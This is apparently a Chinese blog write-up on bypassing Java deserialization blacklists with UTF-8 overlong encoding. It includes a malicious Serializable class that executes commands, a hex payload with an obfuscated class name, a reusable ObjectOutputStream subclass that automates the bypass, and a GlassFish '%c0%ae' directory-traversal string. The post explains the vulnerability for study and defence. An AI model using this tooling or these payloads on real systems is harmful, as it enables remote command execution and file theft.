前言:

记录以下UTF-8 Overlong Encoding导致的安全问题;

参考: 1ue师傅;lzstar师傅;

UTF-8

UTF-8 就是一种变长的编码方式。它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长度

UTF-8 的编码规则:

  • 对于单字节的符号,字节的第一位设为0,后面7位为这个符号的 Unicode 码。因此对于英语字母,UTF-8 编码和 ASCII 码是相同的。
  • 对于n字节的符号(n > 1),第一个字节的前n位都设为1,第n + 1位设为0,后面字节的前两位一律设为10。剩下的没有提及的二进制位,全部为这个符号的 Unicode 码。

分析

假如有一个恶意类(如下)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
package org.zIxyd;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class Calc implements Serializable {

private String cmd;

public Calc() {
}

public Calc(String cmd) {
this.cmd = cmd;
}


private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ois.defaultReadObject();
Runtime.getRuntime().exec(this.cmd);
}
}

如果存在一处代码,可以反序列化这个类,将会导致任意命令执行;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
package org.zIxyd;
import java.io.*;

public class ExpTest {
public static void main(String[] args) throws IOException, ClassNotFoundException {
Calc calc = new Calc("calc");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(calc);

String string = byteArrayOutputStream.toString();
System.out.println(string);

BytetoHex(byteArrayOutputStream.toByteArray());

//设置黑名单
if (!string.contains("org.zIxyd.Calc")) {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
ois.readObject();
}else{
System.out.println("Hacker!!!");
}
}

public static void BytetoHex(byte[] bytes){
StringBuilder hexString = new StringBuilder();
for (byte b : bytes) {
hexString.append(String.format("%02X", b));
}
System.out.println(hexString.toString());
}
}

/*
输出为:
�� sr org.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63
Hacker!!!
*/

但是这处代码有一层waf:!string.contains("Calc");

可以看到正常序列化时,序列化的数据会包含className;

接下来调试,看看反序列化时怎么拿到className的,1ue师傅已经给出了调用栈:

1
2
3
4
5
ObjectStreamClass#readNonProxy(ObjectInputStream in)
ObjectInputStream#readUTF()
BlockDataInputStream#readUTF()
ObjectInputStream#readUTFBody(long utflen)
ObjectInputStream#readUTFSpan(StringBuilder sbuf, long utflen)

最后是由ObjectInputStream类下的readUTFSpan方法;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
private long readUTFSpan(StringBuilder sbuf, long utflen)
throws IOException
{
int cpos = 0;
int start = pos;
int avail = Math.min(end - pos, CHAR_BUF_SIZE);
// stop short of last char unless all of utf bytes in buffer
int stop = pos + ((utflen > avail) ? avail - 2 : (int) utflen);
boolean outOfBounds = false;

try {
while (pos < stop) {
int b1, b2, b3;
b1 = buf[pos++] & 0xFF;
switch (b1 >> 4) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7: // 1 byte format: 0xxxxxxx
cbuf[cpos++] = (char) b1;
break;

case 12:
case 13: // 2 byte format: 110xxxxx 10xxxxxx
b2 = buf[pos++];
if ((b2 & 0xC0) != 0x80) {
throw new UTFDataFormatException();
}
cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
((b2 & 0x3F) << 0));
break;

case 14: // 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
b3 = buf[pos + 1];
b2 = buf[pos + 0];
pos += 2;
if ((b2 & 0xC0) != 0x80 || (b3 & 0xC0) != 0x80) {
throw new UTFDataFormatException();
}
cbuf[cpos++] = (char) (((b1 & 0x0F) << 12) |
((b2 & 0x3F) << 6) |
((b3 & 0x3F) << 0));
break;

default: // 10xx xxxx, 1111 xxxx
throw new UTFDataFormatException();
}
}
} catch (ArrayIndexOutOfBoundsException ex) {
outOfBounds = true;
} finally {
if (outOfBounds || (pos - start) > utflen) {
pos = start + (int) utflen;
throw new UTFDataFormatException();
}
}

sbuf.append(cbuf, 0, cpos);
return pos - start;
}

其中通过switch (b1 >> 4)来判断是:多少个字节为一个字符;

我这里的ClassName为:org.zIxyd.Calc第一个字符为o;其16进制为 0x6f;

根据代码逻辑,会走到处理一个字节对应一个字符的地方;即返回了 o 的char

1
2
3
case 7:   // 1 byte format: 0xxxxxxx
cbuf[cpos++] = (char) b1;
break;

但难道只有 1 byte format: 0xxxxxxx 时才能获取 o 字符串吗,其实不然,处理俩个字节为一个字符的逻辑和处理三个字节的逻辑都可以返回;

1
2
3
4
5
6
7
8
9
case 12:
case 13: // 2 byte format: 110xxxxx 10xxxxxx
b2 = buf[pos++];
if ((b2 & 0xC0) != 0x80) {
throw new UTFDataFormatException();
}
cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
((b2 & 0x3F) << 0));
break;

这里以两个字节的为列;用python实现:输出一个字母对应的两个字节值

1
2
3
4
5
6
7
8
9
10
11
12
13
import string

b1 = int("11000000", 2)
while (b1 <= int("11011111", 2)):
b2 = int("10000000", 2)
while (b2 <= int("10111111", 2)):
cha = chr(((b1 & 0x1F) << 6) | ((b2 & 0x3F) << 0))
if (cha in string.ascii_lowercase):
print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
if (cha in string.ascii_uppercase):
print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
b2 = b2 + 1
b1 = b1 + 1

其中可以得知o 0xc1 : 0xaf

现在将之前那段恶意的序列化十六进制数据,将6F改成C1AF,再次反序列化这段数据;

这里需要注意,因为ClassName多了一个字节,对应的长度也要改变;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
package org.zIxyd;

import javax.xml.bind.DatatypeConverter;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class CalcTest {
public static void main(String[] args) throws IOException, ClassNotFoundException {

String hexString = "ACED00057372000FC1AF72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63";
byte[] byteArray = DatatypeConverter.parseHexBinary(hexString);

byte[] bytes = hexStringToByteArray(hexString);
String text = new String(bytes);

System.out.println("转换后的字符串为:" + text);
if (!text.contains("org.zIxyd.Calc")) {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArray));
ois.readObject();
}else{
System.out.println("Hacker!!!");
}
}


public static byte[] hexStringToByteArray(String hexString) {
int len = hexString.length();
byte[] data = new byte[len / 2];
for (int i = 0; i < len; i += 2) {
data[i / 2] = (byte) ((Character.digit(hexString.charAt(i), 16) << 4)
+ Character.digit(hexString.charAt(i+1), 16));
}
return data;
}
}

/*

输出为:
转换后的字符串为:�� sr ��rg.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
*/

可以看到o字符已经被混淆了;所以绕过了黑名单

Tools

漏洞分析完了;但是可以想到手动修改ClassName的字节太过麻烦;师傅们用的办法都是重写writeClassDescriptor方法,再加上将类名Overlong Encoding的逻辑(具体思路可以看看lzstar师傅)

然后看了一下评论,说重写writeUTF相比之下简单一点(确实简单不少);所以就有了下面这段代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.HashMap;

public class OverlongExp extends ObjectOutputStream {

private static HashMap<Character, int[]> map;
static {
map = new HashMap<>();
map.put('.', new int[]{0xc0, 0xae});
map.put(';', new int[]{0xc0, 0xbb});
map.put('$', new int[]{0xc0, 0xa4});
map.put('[', new int[]{0xc1, 0x9b});
map.put(']', new int[]{0xc1, 0x9d});
map.put('_', new int[]{0xc1, 0x9f});
map.put('a', new int[]{0xc1, 0xa1});
map.put('b', new int[]{0xc1, 0xa2});
map.put('c', new int[]{0xc1, 0xa3});
map.put('d', new int[]{0xc1, 0xa4});
map.put('e', new int[]{0xc1, 0xa5});
map.put('f', new int[]{0xc1, 0xa6});
map.put('g', new int[]{0xc1, 0xa7});
map.put('h', new int[]{0xc1, 0xa8});
map.put('i', new int[]{0xc1, 0xa9});
map.put('j', new int[]{0xc1, 0xaa});
map.put('k', new int[]{0xc1, 0xab});
map.put('l', new int[]{0xc1, 0xac});
map.put('m', new int[]{0xc1, 0xad});
map.put('n', new int[]{0xc1, 0xae});
map.put('o', new int[]{0xc1, 0xaf});
map.put('p', new int[]{0xc1, 0xb0});
map.put('q', new int[]{0xc1, 0xb1});
map.put('r', new int[]{0xc1, 0xb2});
map.put('s', new int[]{0xc1, 0xb3});
map.put('t', new int[]{0xc1, 0xb4});
map.put('u', new int[]{0xc1, 0xb5});
map.put('v', new int[]{0xc1, 0xb6});
map.put('w', new int[]{0xc1, 0xb7});
map.put('x', new int[]{0xc1, 0xb8});
map.put('y', new int[]{0xc1, 0xb9});
map.put('z', new int[]{0xc1, 0xba});
map.put('A', new int[]{0xc1, 0x81});
map.put('B', new int[]{0xc1, 0x82});
map.put('C', new int[]{0xc1, 0x83});
map.put('D', new int[]{0xc1, 0x84});
map.put('E', new int[]{0xc1, 0x85});
map.put('F', new int[]{0xc1, 0x86});
map.put('G', new int[]{0xc1, 0x87});
map.put('H', new int[]{0xc1, 0x88});
map.put('I', new int[]{0xc1, 0x89});
map.put('J', new int[]{0xc1, 0x8a});
map.put('K', new int[]{0xc1, 0x8b});
map.put('L', new int[]{0xc1, 0x8c});
map.put('M', new int[]{0xc1, 0x8d});
map.put('N', new int[]{0xc1, 0x8e});
map.put('O', new int[]{0xc1, 0x8f});
map.put('P', new int[]{0xc1, 0x90});
map.put('Q', new int[]{0xc1, 0x91});
map.put('R', new int[]{0xc1, 0x92});
map.put('S', new int[]{0xc1, 0x93});
map.put('T', new int[]{0xc1, 0x94});
map.put('U', new int[]{0xc1, 0x95});
map.put('V', new int[]{0xc1, 0x96});
map.put('W', new int[]{0xc1, 0x97});
map.put('X', new int[]{0xc1, 0x98});
map.put('Y', new int[]{0xc1, 0x99});
map.put('Z', new int[]{0xc1, 0x9a});
}

public OverlongExp(OutputStream out) throws IOException {
super(out);
}

public void writeUTF(String str) throws IOException {

writeShort(str.length() * 2);
for (int i = 0; i < str.length(); i++) {
int[] bs = map.get(str.charAt(i));
super.write(bs[0]);
super.write(bs[1]);
}
}
}

对比一下混淆之前和混淆之后的CC5

总结

Overlong Encoding导致的安全问题不止局限于java反序列化中,例如:GlassFish在解码URL时,没有考虑UTF-8 Overlong Encoding攻击,导致将%c0%ae解析为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

最后贴一下p神写了一个简单的Python函数,用于将一个ASCII字符串转换成Overlong Encoding的UTF-8编码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def convert_int(i: int) -> bytes:
b1 = ((i >> 6) & 0b11111) | 0b11000000
b2 = (i & 0b111111) | 0b10000000
return bytes([b1, b2])


def convert_str(s: str) -> bytes:
bs = b''
for ch in s.encode():
bs += convert_int(ch)

return bs


if __name__ == '__main__':
print(convert_str('.')) # b'\xc0\xae'
print(convert_str('org.example.Evil'))